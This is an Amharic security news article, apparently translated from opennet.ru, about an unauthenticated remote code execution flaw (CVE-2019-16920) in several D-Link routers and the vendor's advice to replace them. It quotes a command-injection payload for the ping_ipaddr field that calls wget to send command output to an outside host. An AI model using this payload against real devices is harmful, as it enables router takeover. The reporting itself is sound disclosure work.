በዲ-ሊንክ ራውተሮች ውስጥ በርቀት ሊበዘበዝ የሚችል ተጋላጭነት

በዲ-ሊንክ ገመድ አልባ ራውተሮች ውስጥ ተለይቷል አደገኛ ተጋላጭነት (CVE-2019-16920), ያለማረጋገጫ ተደራሽ የሆነ ልዩ ጥያቄ ወደ "ፒንግ_ሙከራ" ተቆጣጣሪ በመላክ በመሳሪያው በኩል ኮድን በርቀት እንዲፈጽሙ ያስችልዎታል።

የሚገርመው ነገር፣ እንደ ፈርምዌር አዘጋጆቹ፣ የ‹ping_test› ጥሪው መፈፀም ያለበት ከተረጋገጠ በኋላ ብቻ ነው፣ ነገር ግን በእውነቱ ወደ የድር በይነገጽ ውስጥ መግባት ምንም ይሁን ምን በማንኛውም ሁኔታ ይጠራል። በተለይም apply_sec.cgi ስክሪፕት ሲደርሱ እና የ"action=ping_test" ግቤትን ሲያልፉ ስክሪፕቱ ወደ የማረጋገጫ ገጹ ያቀናል፣ነገር ግን በተመሳሳይ ጊዜ ከping_test ጋር የተገናኘውን ተግባር ይፈጽማል። ኮዱን ለማስፈጸም በራሱ በping_test ውስጥ ሌላ ተጋላጭነት ጥቅም ላይ ውሏል፣ ይህም ለሙከራ የተላከውን የአይፒ አድራሻ በትክክል ሳያጣራ ፒንግ መገልገያውን ይጠራል። ለምሳሌ የwget መገልገያውን ለመጥራት እና የ"echo 1234" ትዕዛዝ ውጤቶችን ወደ ውጫዊ አስተናጋጅ ለማስተላለፍ ልክ "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" የሚለውን መለኪያ ብቻ ይጥቀሱ። test.test/?$( echo 1234)"

በዲ-ሊንክ ራውተሮች ውስጥ በርቀት ሊበዘበዝ የሚችል ተጋላጭነት

በሚከተሉት ሞዴሎች ውስጥ የተጋላጭነት መኖሩ በይፋ ተረጋግጧል.

  • DIR-655 ከ firmware 3.02b05 ወይም ከዚያ በላይ ያለው;
  • DIR-866L ከ firmware 1.03b04 ወይም ከዚያ በላይ;
  • DIR-1565 ከ firmware 1.01 ወይም ከዚያ በላይ;
  • DIR-652 (ችግር ስላላቸው የጽኑ ትዕዛዝ ስሪቶች ምንም መረጃ አልተሰጠም)

የእነዚህ ሞዴሎች የድጋፍ ጊዜ አስቀድሞ አልፎበታል, ስለዚህ D-Link ገል .ልተጋላጭነትን ለማስወገድ ለእነሱ ማሻሻያዎችን የማይለቀው ፣ እነሱን እንዲጠቀሙ አይመክርም እና በአዲስ መሣሪያዎች እንዲተኩ ይመክራል። እንደ የደህንነት መጠበቂያ፣ የድር በይነገጽ መዳረሻን ለታመኑ የአይፒ አድራሻዎች ብቻ መገደብ ይችላሉ።

በኋላ ላይ ተጋላጭነቱም እንደነበረ ታወቀ ተጽዕኖ ያደርጋል ሞዴሎች DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 እና DIR-825, እስካሁን ያልታወቁ ዝማኔዎችን ለመልቀቅ አቅዷል.

ምንጭ: opennet.ru

አስተያየት ያክሉ